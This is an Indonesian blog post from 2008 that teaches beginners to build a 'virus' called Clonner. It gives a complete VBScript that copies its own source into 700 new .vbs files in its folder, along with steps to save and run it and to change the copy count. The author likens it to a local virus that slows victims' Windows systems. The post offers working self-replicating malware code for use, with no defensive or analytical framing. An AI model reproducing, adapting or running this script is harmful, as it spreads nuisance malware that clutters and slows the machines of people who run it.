12.23.2008

Bikin Virus Clonner

0 komentar

(Tutorial ini hanya bagi PEMULA. bagi yang sudah profesional, bisa diabaikan. Tapi kalo mau baca juga gak papa ko')


Kalian pernah dengar istilah "Cloning"??
Yup!! Cloning adalah penggandaan pada suatu objek, dan itu berhubungan dengan pembuatan virus kali ini, Saya akan memberikan Script Worm yang dapat menngandakan dirinya sesuai kehendak kalian, tetapi penggandaan hanya terjadi pada direktori/folder dimana virus awal tersimpan dan tidak akan menjalar ke folder lain.

Virus lokal lokal yang menggunakan teknik ini adalah virus "Linong" yang membuat windows korban menjadi sesak dan lambat akibat banyaknya virus didalamnya.

Yuk dimulai :
1. Bukan Notepad atau Wordpad atau software penyunting text lainnya.

2. Salin Script berikut :

On Error Resume Next
dim Vir,Rus,Clo,Ning
set Vir=CreateObject("Scripting.FileSystemObject")
set Rus=Vir.opentextfile(wscript.ScriptFullName)
Clo=Rus.readall
Rus.close
for V =1 to 700
set Ning=Vir.CreateTextFile("Clonner" & V & ".vbs")
Ning.write Clo
Ning.close
next

3. Simpan file tersebut, jangan lupa untuk mengganti pilihan "Text Document (*.txt)" menjadi "All Files" lalu beri nama "Clonner.vbs" (Tanpa tanda petik).

NB : Sebaiknya file tersebut disimpan pada folder tersendiri.

4. Jalankan file Clonner.vbs.

Tunggu beberapa saat maka akan tercipta virus lain dengan nama Clonner1.vbs, Clonner2.vbs, dan seterusnya hingga Clonner700.vbs pada folder di mana file Clonner.vbs tersimpan, dan semua file tersebut berisi script yang sama dengan file Clonner.vbs.
O... iya hampir lupa, code yang Saya beri warna merah, tepatnya kode "1 to 700" adalah jumlah Cloning yang akan dihasilkan. Di sana Saya beri contoh 700 berarti Clonner.vbs yang akan tercipta adalah 1 sampai 700. Kalian bisa memodifikasinya sendiri sesuai kemauan.

0 komentar:

Posting Komentar

Related Posts with Thumbnails